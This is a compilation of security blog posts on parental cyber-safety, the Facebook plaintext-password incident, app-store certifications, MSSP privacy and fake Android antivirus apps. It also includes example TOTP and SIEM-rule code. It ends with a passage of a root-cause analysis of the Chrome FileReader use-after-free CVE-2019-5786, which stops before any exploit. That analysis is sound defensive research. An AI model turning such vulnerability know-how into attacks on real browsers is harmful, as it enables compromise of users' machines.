What Online Risks Concern Aussie Parents the Most?

Aussie parents have many concerns about the risks posed by the online world. I believe however, the following are the ones that increase parents’ blood pressure the most!

Screen time – The time our kids spend glued to screens is a huge concern for many Aussie parents. Whether you are concerned about ‘tech neck’, the growing rates of childhood obesity or simply, the lack of conversation at home – you would not be alone! Research by The Australian Institute of Family Studies shows that 12-13 year old Aussie kids are spending a whopping 3 hours a day in front of screens during the week and then 4 hours on the weekends. No wonder many parents are concerned.

Gaming – Recent research conducted by McAfee shows that some Aussie teens are spending up to 4 hours a day gaming. And while parents naturally worry about the opportunity cost associated with the time, their greater concern is around the risk of online grooming and of exposure to inappropriate and violent material.

Cyberbullying – This is the big one for many parents and rightly so. Cyberbullying can be absolutely devastating for victims. A quick Google search turns up far too many examples of young adults who have suffered significant psychological trauma or even lost their lives as a result of unchecked cyberbullying. Last year, our e-Safety Commissioner reported a 35% increase in cases of reported cyberbullying as compared to the previous year.

But Why Aren’t Parents Taking Action?

As a group of parents, there is no doubt we are concerned about screen time, gaming addiction, online grooming, and cyberbullying, but many of us aren’t taking the necessary action to intervene and protect our kids. So, McAfee probed a little deeper in recent research and discovered that almost half of Aussie parents believe that their children can manage their own cyber safety from the age of just 10. Now, when my boys were 10, they were barely able to manage their own lunchboxes! So, this belief truly stuns me.

So, we have some parents who just don’t know where to start and others who believe it isn’t their responsibility. Regardless, there is clearly a need to take some decisive action to protect our kids from both online risks and problematic anti-social behaviours.

What Steps Can Parents Take Now to Protect Their Kids Digital Lives?

The good news is there are a few simple things parents can do to protect their kids and their growing fleet of internet connected devices. Here are my top tips:

  • Check a Device’s Security Track Record

Before buying any connected device, always research the brand and read reviews on a product’s security (or lack of). A quick web search will give you some pretty fast insight into the potential device’s security standards. Going with a notable brand that has a proven security track record is often the best option.

  • Always Change Default Settings, Use Strong Passwords & Enable Two-Factor Authentication

Default and weak passwords are the biggest threat to the security of internet-connected devices. Hackers are very familiar with both default and obvious passwords, and they use them to get at the data on your devices. If the thought of remembering several passphrases daunts you, use a password manager. While a strong, unique password is a great place to start, enabling two-factor authentication on your devices and accounts means you also have to verify your identity with something that you (and only you) have access to, most commonly a mobile device, which gives you a higher level of security.

  • Keep Your Devices Up To Date

Device software updates are usually designed to protect your device from recently discovered security bugs, vulnerabilities and threats. If you’re in the common habit of ignoring update notifications, turning on auto-update will ensure you apply these patches as soon as they are released and have maximum protection.

  • Invest in a Router that Protects Your Devices & Offers Parental Controls!

Investing in a Wi-Fi router with built-in protection like McAfee’s Secure Home Platform is one of the easiest ways of both managing and protecting your family’s fleet of devices. Not only does it automatically protect any device that connects to the Wi-Fi but it comes with some very strategic parental controls. So not only can you take back control and proactively manage your kids’ screen time but you can set up customised profiles to ensure they are visiting only suitable sites.
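To make the two-factor authentication tip above concrete, here is an added example (not part of the original post) of what the “something you have” on your phone actually does: the time-based one-time codes of RFC 6238 (built on the HOTP construction of RFC 4226) that authenticator apps display, together with the check a website performs when you type one in. The secret and timestamps are the test values published in those RFCs; the verifier class, its skew window and its replay check are this example’s own design, not any vendor’s code.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226 HOTP: HMAC the moving counter, then truncate to a short decimal code."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at_time: int, step: int = 30, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 6238 TOTP: the counter is the number of `step`-second slots since the Unix epoch."""
    return hotp(secret, int(at_time) // step, digits, algo)


class TotpVerifier:
    """Server-side check for one user's codes.

    Accepts the current time slot plus/minus `window` slots (phone clocks drift and
    people type slowly) and refuses to accept any slot at or before the last one
    that succeeded, so a code that was phished or shoulder-surfed cannot be replayed.
    In a real deployment `last_step` is persisted per user next to the secret.
    """

    def __init__(self, secret: bytes, window: int = 1, step: int = 30, digits: int = 6):
        self.secret = secret
        self.window = window
        self.step = step
        self.digits = digits
        self.last_step = -1

    def verify(self, code: str, now=None) -> bool:
        now = int(time.time()) if now is None else int(now)
        current = now // self.step
        for delta in range(-self.window, self.window + 1):
            slot = current + delta
            if slot <= self.last_step:                        # replay protection
                continue
            expected = hotp(self.secret, slot, self.digits)
            if hmac.compare_digest(expected, code):           # constant-time compare
                self.last_step = slot
                return True
        return False


if __name__ == "__main__":
    # RFC 6238 test secret (ASCII "12345678901234567890").
    demo_secret = b"12345678901234567890"
    print(totp(demo_secret, int(time.time())))               # what the authenticator app shows now
```

The secret shared with the phone is as sensitive as a password: it must be generated from a cryptographically secure source, stored encrypted at rest, and never logged. A window of one slot either side is the usual compromise between tolerating clock drift and keeping the number of valid codes per attempt small; pair it with rate limiting on the login endpoint, since a six-digit code only has a million possibilities.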

As a mum of 4, I believe that managing the risk in our kids’ cyber lives needs to be a genuine priority for us all. So, yes, let’s keep talking to our kids about online risks and the need to self-regulate our online behaviour. But, if we could also add in a layer of automatic protection for our kids’ devices from McAfee’s Secure Home Platform and some savvy parental controls to ensure our kids are on track, then I think that’s a pretty compelling parenting hack for us first generation digital parents!

Take Care

Alex xx


The post The Ultimate CyberParenting Hack – Managing Your Family’s Cybersafety with the help of your Wi-Fi Router! appeared first on McAfee Blogs.

Weekly Update 131


So firstly, sorry for the audio quality. I'm pretty damn frustrated with those Instamics right now between the flakey firmware upgrade process and the unexpected loss of recording today. I'll make sure I get on top of it for next time.

I'm sitting at the gate in Seattle right now about to board so I'm going to cut this intro short and jump straight into the vid. Here's this week's which has a bunch of different things in it I found interesting including the usual raft of data breaches and other industry bits and pieces. Gotta fly, enjoy!


References

  1. I'm doing a keynote for Akamai in Sydney on Thursday (hear more from me on data breaches and cyber-things)
  2. And another NDC meetup in Sydney that night (we packed these out in Brisbane and Sydney so register quickly for this one if you want to come along)
  3. The owner of Exactis wasn't real happy about the impact of their data breach on his business (yeah, the people whose data they sold weren't real happy either...)
  4. Elsevier looks like they logged a bunch of passwords in plain text (who would do that... oh, wait...)
  5. Facebook looks like they logged a bunch of passwords in plain text (they join Twitter and GitHub from last year in doing the same thing)
  6. Never ever, ever, ever install spyware on the devices of anyone you actually care about (seriously, how often are we going to go down this path?!)
  7. Twilio is sponsoring my blog again this week (they're talking 2FA with Authy, something you definitely want to look into if you're building any sort of auth system)

Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home

Like most parents, before you go to sleep each night, you take extra care to lock doors and windows to keep your family safe from any outside threats. The only thing you may have overlooked is the smartphone illuminated on your nightstand. And if you were to add up the smartphones humming all over your house, suddenly you’d have a number of unlocked doors that a determined criminal could enter through. Maybe not tonight — but eventually.

Digital Ecosystem

Over time you’ve purchased and plugged in devices throughout your home. You might have a voice assistant, a baby monitor, a thermostat, a treadmill, a gaming system, a fitness watch, smart TVs, a refrigerator, and many other fun, useful gadgets. Each purchase likely connects to your smartphone. Take stock: You now have a digital ecosystem growing all around you. And while you rarely stop to take notice of this invisible power grid around you, hackers can’t stop thinking about it.

This digital framework that pulsates within your home gives cybercriminals potential new entryways into your life and your data. Depending on your devices, by accessing your smartphone, outsiders may be able to unlock your literal doors while you are away (via your home security system), eavesdrop on your family conversations and collect important information (via your voice assistant), or access financial information (via your gaming system, tablet, or laptop).

What you can do:

  • Change factory security settings. Before you fire up that smart TV, drone, or sound system, be sure to change each product’s factory settings and replace the default password with a strong, unique one to put a layer of protection between you and would-be hackers.
  • Protect your home network. We are connected people living in connected homes. So, part of the wired lifestyle is taking the lead on doing all we can to protect it. One way to do that is at the router level with built-in network security, which can help secure your connected devices.
  • Stay on top of software updates. Cybercrooks rely on consumers to ignore software updates; it makes their job so much easier. So be sure to install updates to your devices, security software, and IoT products when alerted to do so.

Smartphone = Front Gate

The most common entry point to all of these connected things is your smartphone. While you’ve done a lot of things to protect your phone (a lock screen, strong passwords on accounts, and system updates), there are hacking tactics you likely know nothing about, and according to McAfee’s recent Mobile Threat Report the scope and complexity of mobile attacks are increasing at an alarming rate.

Hidden Apps

The latest statistics report that the average person has between 60-90 apps installed on their phones. Multiply that between all the users in your home, and you are looking at anywhere from 200-500 apps living under your digital roof. Hackers gravitate toward digital trends. They go where the most people congregate because that’s where they can grab the most money. Many of us control everything in our homes from our apps, so app downloads are off the charts, which is why crooks have engineered some of their most sophisticated schemes specifically around app users.

Hidden apps are a way that crooks trick users into letting them inside their phones. Typically, hidden apps reach users when they download games or customized tools, sometimes through Google Play itself. TimpDoor, for example, reaches users through a text message with a link to a supposed voice message and detailed instructions for enabling installation of apps from unknown sources. That link downloads malware that keeps running in the background after the app is closed. Users often forget they downloaded it and go on with life while the malware quietly uses the phone as a way into the internal networks the phone is connected to.

What you can do:

  • Stay alert. Don’t fall for the traps or click links to other apps sent via text message.
  • Stay legit. Only download apps hosted by the original trusted stores and verified partner sites.
  • Avoid spam. Don’t click on any email links, pop-ups, or direct messages that include suspicious links, password prompts, or fake attachments. Delete and block spam emails and texts.
  • Disable and delete. If you are not using an app, disable it. And, as a safety habit, remove apps from your phone, tablet, or laptop you no longer use.

Fake Apps

Again, crooks go where the most people congregate, and this year that is Fortnite, a game with more than 60 million downloads. The Fortnite craze has led hackers to design fake Fortnite apps masquerading as the real thing. The fraudulent app designers go to great lengths to make the download look legitimate. They offer enticing downloads and promise users a ton of free perks and add-ons. Once users download the fake app, crooks can collect money through ads, send text messages with more bad app links, cryptojack the device, or install malware or spyware.

What you can do:

  • Don’t install apps from unknown sources. Not all gaming companies distribute via Google Play or the App Store. This makes it even harder for users to know that the app they are downloading is legit. Do all you can to verify the legitimacy of the site you are downloading from.
  • Delete suspicious acting apps. If you download an app and it begins to request access to anything outside of its service, delete it immediately from your device.
  • Update devices regularly. Keep new bugs and threats at bay by updating your devices automatically.
  • Monitor bank statements. Check statements regularly to monitor the activity of the card linked to your Fortnite account. If you notice repeat or multiple transactions from your account or see charges that you don’t recognize, alert your bank immediately.
  • Be a savvy app user. Verify an app’s legitimacy. Read other user reviews and be discerning before you download anything. This practice also applies to partner sites that sell game hacks, credits, patches, or virtual assets players use to gain rank within a game. Beware of “free” downloads and avoid illegal file-sharing sites. Free downloads can be hotbeds for malware. Stick with the safer, paid options from a reputable source.

The post Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home appeared first on McAfee Blogs.

Facebook Users: Here are Proactive Tips to Keep Your Data Safe

Social media has become extremely popular over the years, providing users with an easy way to communicate with their friends and family. As social media users, we put a lot of faith and trust in these platforms to maintain the security of our private information. But what happens when our private information is mishandled? The reality is that these incidents happen and users need to be prepared. Yesterday, Facebook announced that it did not properly mask the passwords of hundreds of millions of its users, primarily those associated with Facebook Lite.

You might be wondering how exactly this happened. It appears that many user passwords for Facebook, Facebook Lite, and Instagram were logged in plaintext to internal company systems, which thousands of Facebook employees could access and could potentially have searched. Thankfully, no cases of data misuse were reported in the investigation, and these passwords were never visible to anyone outside of the company. According to Facebook software engineer Scott Renfro, Facebook is investigating long-term infrastructure changes to prevent these security issues going forward.

According to Facebook’s vice president of engineering, security, and privacy, the company has corrected the password logging bug and plans to notify the users whose passwords may have been exposed. But what can users do to better protect their data when an incident like this occurs? Check out the following tips:

  • Change your password. As a precautionary step, update your Facebook and Instagram passwords by going into the platforms’ security and privacy settings. Make sure your passwords are unique and complex.
  • Use multi-factor authentication. While this shouldn’t be your be-all and end-all security solution, it can help protect your credentials in the case of data exposure.
  • Set up a password manager. Using a password manager is one of the easiest ways to keep track of and manage your passwords so you can easily change them after these types of incidents occur.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Users: Here are Proactive Tips to Keep Your Data Safe appeared first on McAfee Blogs.

McAfee Web Security offers a more flexible approach to Data Privacy

Post-GDPR, there is still a lot of complexity in data privacy and data residency requirements. Depending on where they are located, what industry they are in, and how diverse their customer base is, companies require a high degree of flexibility in the tools they use for web security. While most web security products in the market today simply document their data handling practices as part of GDPR compliance, McAfee strives to give customers more flexibility to implement the level of data privacy appropriate for their business. Most of our McAfee Web Protection customers use our technologies to manage employee web traffic, which requires careful handling when it comes to processing Personal Data.

Our latest update to the McAfee Web Gateway Cloud Service introduced two key features for customers to implement their data privacy policies:

  • Concealment of Personal Data in internal reporting: We enable you to conceal or pseudonymize certain fields in our access logs. You can still report on the data but Personal Data is obfuscated. As an example, you can report on how much your Top Web Users surfed the Internet, but administrators cannot identify who that top user is.


  • Full control of data residency: Especially in heavily regulated industries, many of our customers have asked for the ability to control where their log data goes so that they have control over data residency. We give you that control. For example, you can currently select between the EU and US as data storage points for users connecting in each geographical region. Additional finer control can be achieved by configuring client proxy settings, or through Hybrid policy. And, in conjunction with Content Security Reporter 2.6, customers can centrally report on all the data, while providing access control on the generated reports.


As a globally dispersed organization, we still have limits on what we can offer: our support and engineering teams, for instance, might need to access data from other geographies for troubleshooting purposes. Telemetry and other data required to operate the service would still be global. But customers want more control over the access logs that contain PII, and we give it to them to the extent that we can.

McAfee Web Gateway Cloud Service is built for the enterprise, and many organizations will gain a higher level of performance than they currently experience on premises. As your security team continues to manage highly sophisticated malware and targeted attacks that evade traditional defences, McAfee Web Gateway Cloud Service allows you to go beyond basic protection, with behaviour emulation that prevents zero-day malware in milliseconds as traffic is processed.

The post McAfee Web Security offers a more flexible approach to Data Privacy appeared first on McAfee Blogs.

Give Hacking a Try…You Might Just Be Great!

One of the biggest challenges facing the AppSec industry today is the lack of skilled people. No matter how many firewalls are stood up, scans are run, or courses attended, almost all security efforts require highly trained practitioners. Whether it’s penetration testers, developers, hiring managers or release engineers, there are thousands of unfilled roles waiting for the right hires.

3059 android malware detected per day in 2018 – Are you still counting on free android antivirus for protection?

The incidence of cyber-attacks on smartphones, especially those running the popular Android operating system, has been rising constantly. A major reason people continue to choose Android smartphones is that they are mostly cheap to buy. However, the year 2018 ended with…

Managed Google Play earns key certifications for security and privacy

Posted by Mike Burr, Android Enterprise Platform Specialist

[Cross-posted from the Android Enterprise Keyword Blog]

With managed Google Play, organizations can build a customized and secure mobile application storefront for their teams, featuring public and private applications. Organizations' employees can take advantage of the familiarity of a mobile app store to browse and download company-approved apps.

As with any enterprise-grade platform, it's critical that the managed Google Play Store operates with the highest standards of privacy and security. Managed Google Play has been awarded three important industry designations that are marks of meeting the strict requirements for information security management practices.

ISO 27001 is the information security standard published by the International Organization for Standardization; achieving certification against it demonstrates that a company meets stringent privacy and security requirements when operating an Information Security Management System (ISMS). Additionally, managed Google Play received SOC 2 and SOC 3 reports, which are benchmarks of strict data management and privacy controls. These attestation and auditing procedures are developed by the American Institute of Certified Public Accountants (AICPA).

Meeting a high bar of security management standards

To earn the ISO 27001 certification, auditors from Ernst & Young performed a thorough audit of managed Google Play based on established privacy principles. The entire methodology of documentation and procedures for managing other companies' data is reviewed during an audit, and must be made available for regular compliance review. Companies that use managed Google Play are assured their data is managed in compliance with this industry standard. ISO 27001 certification also supports GDPR compliance efforts.

Secure data management

With SOC 2 and SOC 3 reports, the focus is on controls relevant to data security, availability, processing integrity, confidentiality and privacy, which are verified through audit reports. In managed Google Play, the data and private applications that enter Google's systems are administered according to strict protocols, including determinations of who can view them and under what conditions. Enterprises require and receive the assurance that their information is handled with the utmost confidentiality and that the integrity of their data is preserved. For many companies, a SOC 2 and SOC 3 report is a requirement when selecting a specific service. These reports attest that a service company has met and is abiding by best practices set forth by the AICPA to ensure data security.

Our ongoing commitment to enterprise security

With managed Google Play, companies' private apps for internal use are protected with a set of verified information security management processes and policies to ensure intellectual property is secure. This framework includes managed Google Play accounts that are used by enterprise mobility management (EMM) partners to manage devices.

Our commitment is that Android will continue to be a leader in enterprise security. As your team works across devices and shares mission-critical data through applications hosted in managed Google Play, you have the assurance of a commitment to providing your enterprise the highest standards of security and privacy.

Facebook stored hundreds of millions of passwords unprotected

Company admits to mistake and says it has no evidence of abuse – but the risk was huge

Facebook mistakenly stored “hundreds of millions” of passwords in plaintext, without hashing or any other protection, the company has admitted.

The mistake, which led to user passwords being kept in Facebook’s internal servers in an insecure way, affects “hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users”, according to the social networking site. Facebook Lite is a version of Facebook created for use in nations where mobile data is unaffordable or unavailable.


Why Take the Risk? Addressing Privacy Concerns with an MSSP

One concern that often arises when a company is considering hiring a Managed Security Service Provider (MSSP) and outsourcing its security functions is the risk of allowing a third party to monitor and take care of sensitive data. For many companies, this can be a source of great anxiety. Allowing a third party to access sensitive organization data and customer Personally Identifiable Information (PII) raises the question: what exactly is my MSSP monitoring?

While handing your data to another entity always carries risk, it is important to know that a responsible MSSP is contractually bound to protect your privacy and is only interested in monitoring the security of your organization.

Let’s start to address the concerns by taking a look at what MSSPs are not monitoring:

What an MSSP is not monitoring:

A responsible MSSP places a high value on protecting client confidentiality and is primarily concerned with protecting the integrity of the client’s network infrastructure and data. As such, even where the technical ability exists, MSSP staff do not review browsing activity or history, email content and recipients, or database contents, which keeps the activity of your staff and executives private. MSSP personnel strictly adhere to confidentiality agreements and act professionally. If sensitive information is seen, it is not discussed.

There are ways to ensure confidentiality is maintained, including detailed service level agreements (SLA) and statements of work (SOW). These are essential when transferring risk to an MSSP and can offer legal protections to a company in the event of a data breach.

What an MSSP is monitoring:

Typically, an MSSP will aggregate logs and events from multiple systems and sources within the client’s network infrastructure into a security information and event management (SIEM) system. Those logs and events will come from infrastructure components like firewalls, endpoint security applications, and operating systems. The SIEM will be configured with alerting rules that generate alerts from the incoming logs for MSSP personnel to investigate and act upon.
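As an added illustration of what such an alerting rule looks like (this is not part of the original post and not any particular MSSP's rule set), here is a minimal SIEM-style correlation rule in JavaScript, run over a few constructed authentication events. The log layout, field names, thresholds and host names are assumptions made for the example.

```javascript
// Added example, not from the original post and not any MSSP's actual rule set:
// a minimal SIEM-style correlation rule run over constructed authentication
// events. It fires when one source address produces FAIL_THRESHOLD or more
// failed logins inside WINDOW_SECONDS and then a successful login, the usual
// "brute force, then success" pattern an analyst wants to be paged for.
// Log layout, field names, thresholds and host names are assumptions.

const FAIL_THRESHOLD = 5;
const WINDOW_SECONDS = 60;

// Constructed sample events: "<ISO time> <host> <outcome> user=<u> src=<ip>"
const SAMPLE_EVENTS = [
  // burst of failures then success from one address: should alert
  '2019-03-21T10:00:00Z vpn01 login_failed user=jdoe src=198.51.100.7',
  '2019-03-21T10:00:04Z vpn01 login_failed user=jdoe src=198.51.100.7',
  '2019-03-21T10:00:09Z vpn01 login_failed user=admin src=198.51.100.7',
  '2019-03-21T10:00:11Z vpn01 login_failed user=root src=198.51.100.7',
  '2019-03-21T10:00:15Z vpn01 login_failed user=jdoe src=198.51.100.7',
  '2019-03-21T10:00:20Z vpn01 login_ok user=jdoe src=198.51.100.7',
  // a single typo then success: normal user, no alert
  '2019-03-21T10:05:00Z vpn01 login_failed user=asmith src=203.0.113.4',
  '2019-03-21T10:05:30Z vpn01 login_ok user=asmith src=203.0.113.4',
  // five failures spread over eight minutes: outside the window, no alert
  '2019-03-21T11:00:00Z vpn01 login_failed user=bob src=192.0.2.9',
  '2019-03-21T11:02:00Z vpn01 login_failed user=bob src=192.0.2.9',
  '2019-03-21T11:04:00Z vpn01 login_failed user=bob src=192.0.2.9',
  '2019-03-21T11:06:00Z vpn01 login_failed user=bob src=192.0.2.9',
  '2019-03-21T11:08:00Z vpn01 login_failed user=bob src=192.0.2.9',
  '2019-03-21T11:08:30Z vpn01 login_ok user=bob src=192.0.2.9',
  'this line is not an auth event and is ignored',
];

// Normalises one raw line into the fields the rule needs; returns null for
// lines the rule does not understand (a real SIEM parser does this per source).
function parseEvent(line) {
  const m = line.match(/^(\S+) (\S+) (login_failed|login_ok) user=(\S+) src=(\S+)$/);
  if (!m) return null;
  return { ts: Date.parse(m[1]) / 1000, host: m[2], outcome: m[3], user: m[4], src: m[5] };
}

// Sliding-window correlation keyed on source address. Events are sorted by
// time first, since collectors do not guarantee ordering.
function correlate(lines) {
  const failures = new Map();          // src -> failure timestamps still inside the window
  const alerts = [];
  const events = lines.map(parseEvent).filter(Boolean).sort((a, b) => a.ts - b.ts);
  for (const ev of events) {
    const recent = (failures.get(ev.src) || []).filter((t) => ev.ts - t <= WINDOW_SECONDS);
    if (ev.outcome === 'login_failed') {
      recent.push(ev.ts);
    } else if (recent.length >= FAIL_THRESHOLD) {
      alerts.push({ rule: 'bruteforce_then_success', src: ev.src, user: ev.user,
                    host: ev.host, failures: recent.length, at: new Date(ev.ts * 1000).toISOString() });
      recent.length = 0;               // one alert per burst, not one per later success
    }
    failures.set(ev.src, recent);
  }
  return alerts;
}

console.log(correlate(SAMPLE_EVENTS));
```

The two negative cases are what make the rule usable in practice: a single mistyped password followed by a success must not page anyone, and failures spread thinly over a long period must not accumulate into a false alert, which is why the window is applied before the threshold is checked.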

Why partner with an MSSP?

Cost Advantage

Contracting with a third party to handle your organization’s network and information security has significant advantages, especially for small and medium-sized businesses that may not have the budget for a dedicated in-house information security team.  In fact, hiring an MSSP over an in-house staff is a way to make the most of your money by gaining access to 24/7 expertise without the burden of finding and retaining staff during the massive cybersecurity skills shortage.

Business Advantage

When you partner with an effective MSSP, they will provide monthly reports that not only improve visibility into your security posture, but also act as a tool to justify and build budget for future security needs.  This allows you to map your security objectives to the greater business objectives, which in turn helps get leadership on board with your efforts.

Technology Adaptability

A quality MSSP will be technology agnostic, with the ability to adapt to your current infrastructure, technology, and existing applications that you’ve already invested time and budget into.

Access to Expertise

Perhaps the largest benefit of contracting with an MSSP is the level of security expertise the MSSP can provide.  A quality MSSP will be staffed with security experts who are highly skilled in network and information security, organized to detect, analyze, respond to, report on, and prevent cybersecurity events.

Ultimately, when you engage the services of an MSSP, you receive peace of mind knowing that not only is your data protected around the clock, but your privacy is also prioritized and maintained.

Don’t settle for any MSSP; follow our Comprehensive Guide to find the right one for your needs.

The post Why Take the Risk? Addressing Privacy Concerns with an MSSP appeared first on GRA Quantum.

Return to Workplace: Ready to Relaunch Your Career

By: Sheetal, Application Developer & Majy, IT Support

McAfee offers a new program that offers professionals who dedicated extended time to their families the chance to reignite their passion for the technology industry and relaunch their careers.

Sometimes, it’s necessary to put your career on hold to raise kids, care for loved ones or serve your country. For many, it can be daunting to reenter the workplace after time away. That’s why McAfee designed its Return to Workplace program.

Launched in India in 2018, the 12-week Return to Work program offers training, support and resources for those who are looking to reenter the technology field and put their careers back on track.

Read Sheetal’s and Majy’s stories about how McAfee’s Return to Workplace program helped them build the skills they needed to reenter the workforce and come back strong.

Sheetal’s Return to Workplace Journey – Application Developer

To pursue my love for technology, I moved to Bangalore to complete my engineering degree in computer science, and I found rewarding work as a Quality Auditor. In 2015, I added another momentous title to my resume—mom. I gave birth to my first child and took my maternity leave; however, family circumstances extended my break.

Returning to Tech

Three years later, I was finally ready to get back to work, and I anxiously began my job hunt. It wasn’t as easy as I thought it would be, and I had a few concerns to say the least. Not only did I fear I’d be behind in the fast-paced technology industry, I also feared I wouldn’t find a supportive workplace as a single mom.

All Thanks to McAfee

As a single mother, McAfee allowed me to balance both my career and my family by giving me flexible work hours, technical mentoring, soft skills training, sessions with the HR team and several other resources to sharpen my professional skills. It helped me build my confidence over time, and today, I am working as a part of the application development team, assuring that the business works efficiently as possible.

McAfee has offered not only me, but a number of other wonderful women, a second chance to resume their careers at their own pace, without having to give up time with their families and children.

Majy’s Story – IT Support

Passionate about technology, I pursued my education in engineering at Calicut University and began my career soon after as a software engineer. I loved my career and the people I worked with—it’s what got me out of bed and excited about each day. Eventually, my reasons to start the day shifted when my husband and I were blessed with our first child. I decided it was time to put a hold on my career, to be there for my son and spend quality time at home during those early development years.

Facing Fears About Getting Back to Work

My son was growing up right before my eyes, and as he became more independent, I considered returning to my career. Even though I was eager to get back to work, I feared I wouldn’t find a company that allowed me to manage both a fulfilling career and raising a child at home—or if my skills would still be relevant.

 

Discovering McAfee Was the Best Thing Ever

McAfee’s Return to Workplace initiative completely blew me away. With the working environment that McAfee offered me, which was flexible and encouraging, I absolutely could not miss this opportunity. McAfee offered me several avenues to learn and brush up on my technical skills. They even provided me with a technical mentor! Having access to my mentor created a safe environment where I could ask my technical queries without feeling the pressure of asking the wrong question. In addition to this, the host of online courses I could leverage was an advantage for me. Ultimately, McAfee provided me with an environment where I could learn and grow without feeling intimidated. This was empowering and gave me the push I needed to successfully complete the program. McAfee was my natural first choice for returning to work and I couldn’t have been happier to accept a full-time position.

For more stories like this, follow @LifeAtMcAfee  on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

Ready to relaunch your career? Get the resources you need at McAfee. Apply here.

The post Return to Workplace: Ready to Relaunch Your Career appeared first on McAfee Blogs.

KNOW AND PICK YOUR ANDROID SECURITY APP WISELY



IN BRIEF: In recent years, we have seen a tremendous increase in mobile applications across many countries; it seems everyone wants to release a mobile application, for many reasons. On the other hand, the number of fake and malicious mobile applications is growing rapidly, posing a major security risk to mobile users.
-------------------------------------

Mobile application developers are now facing threats to customers and application data as automated and sophisticated attacks increasingly target the owners, users and data of mobile applications.

Apart from the privacy risks of poorly protected applications from various developers, criminals are also developing mobile applications with malicious intentions, causing thousands of users who download them to fall victim to cybercrime.


It is prudent to secure our mobile devices with security solutions. Sadly, a recent test of anti-malware apps available in Google Play showed that most are not, in fact, worthy of the name and, indeed, the space they take up on the Android device.


Independent testing outfit AV-Comparatives threw the 2,000 most common Android malware samples seen in the wild last year at 250 security (and, as it turns out, also “security”) apps that were available in the Android store in January of this year. Only 80 apps passed the organization’s most basic test – flagging at least 30 percent of the samples as malware while reporting no false positives for some of the most popular and clean apps in Google Play.

Crucially, only 23 apps passed the test with flying colors; that is, they had a 100-percent success rate at detecting the malicious code.

So, what are those purported anti-malware solutions that failed the test up to? You may have guessed it – for the most part, they’ll only foist ads on you. Put differently, instead of keeping you safe from pests that are banking Trojans, ransomware and other threats, many of the fake security apps will apparently only pester you with unwanted ads, all in the name of easy revenue for the developers.


Indeed, some of the products are already detected, at the very least, as “potentially unwanted applications” by at least some reputable mobile security solutions and are likely to be booted by Google from the Android store soon.

In many cases, the apps’ “malware-detecting functionality” consisted of comparing the package name of any given app against the AV app’s own whitelist or blacklist. This way of determining whether a piece of software is safe can, of course, be trivially defeated by malware creators, since a package name is chosen by whoever builds the app. Meanwhile, for the user, it creates a false sense of security.


The fact that many ad-slinging apps are disguised as security solutions may not be a revelation for you. After all, ESET malware researcher Lukáš Štefanko warned early in 2018 about dozens of apps that professed to protect users from malicious code, but were instead only vehicles for displaying ads.

Meanwhile, a number of products that scored poorly in the test were deemed to be the work of what AV-Comparatives called “hobby developers”. Rather than focus on producing quality security software, these software makers apparently produce a variety of apps that are only designed to generate ad revenue for them. Still other developers “just want to have an Android protection app in their portfolio for publicity reasons”, wrote the AV testing outfit.

In addition, user ratings and/or download numbers are not necessarily something to go by. “Most of the 250 apps we looked at had a review score of 4 or higher on the Google Play Store. Similarly, the number of downloads can only be a very rough guide; a successful scam app may be downloaded many times before it is found to be a scam,” wrote AV-Comparatives, adding that the ‘last updated’ date isn’t a reliable indicator, either.


All told, the results can be understandably disheartening. On the other hand, they’re another reminder of the need to stick to reputable products with proven track records in mobile security.

Analysis of a Chrome Zero Day: CVE-2019-5786

1. Introduction

On March 1st, Google published an advisory [1] for a use-after-free in the Chrome implementation of the FileReader API (CVE-2019-5786). Clement Lecigne of Google’s Threat Analysis Group reported the bug as being exploited in the wild, targeting 32-bit Windows 7 systems. The exploit leads to code execution in the renderer process, and a second exploit was used to fully compromise the host system [2]. This blog is a technical write-up detailing the first bug and how to find more information about it. At the time of writing, the bug report [2b] is still sealed. A default installation of Chrome installs updates automatically, so users running the latest version of Chrome are already protected against this bug. To make sure you are running the patched version, visit chrome://version; the version number displayed on the page should be 72.0.3626.121 or greater.

2. Information gathering

2.1 The bug fix

Most of the Chrome codebase is based on the Chromium open source project. The bug we are looking at is contained inside the open source code, so we can directly look at what was fixed in the new release pertaining to the FileReader API. Conveniently, Google shares the changelog for its new release [3].

We can see that there’s only one commit that modifies files related to the FileReader API, with the following message:

The message hints that having multiple references to the same underlying ArrayBuffer is a bad thing. It is not clear what it means right now, but the following paragraphs will work on figuring out what wisdom lies hidden in this message.

For starters, we can look at the commit diff [3b] and see what changed. For ease of reading, here is a comparison of the function before and after the patch.

The old one:

The new one:

The two versions can be found on GitHub at [4a] and [4b]. This change modifies the behavior of the ArrayBufferResult function, which is responsible for returning data when a user accesses the FileReader.result member.
The behavior of the function is as follows: if the result is already cached, return it. If not, there are two cases: if the data has finished loading, create a DOMArrayBuffer, cache it as the result, and return it; if not, create a temporary DOMArrayBuffer and return that instead. The difference between the unpatched and patched versions is how that temporary DOMArrayBuffer is built in the partial-load case. In one case, we can see a call to:


This prompted us to go down a few more rabbit holes. Let us compare what is going on in both the unpatched and patched situation.

We can start with the patched version, as it is the simplest to understand. We can see a call to ArrayBuffer::Create that takes two arguments, a pointer to the data and its length (the function is defined in the source tree at /third_party/blink/renderer/platform/wtf/typed_arrays/array_buffer.h)


This basically creates a new ArrayBuffer, wraps it into a scoped_refptr<ArrayBuffer> and then copies the data into it. The scoped_refptr is the way Chromium handles reference counting [5]. For readers unfamiliar with the notion, the idea is to keep track of how many times an object is being referenced. When a new scoped_refptr instance is created, the reference count of the underlying object is incremented; when the instance goes out of scope, the reference count is decremented. When that reference count reaches 0, the object is deleted (and, for the curious, Chrome will kill the process if the reference count overflows). As we are looking for a potential use-after-free, knowing that the buffer is ref-counted closes some avenues of exploitation.

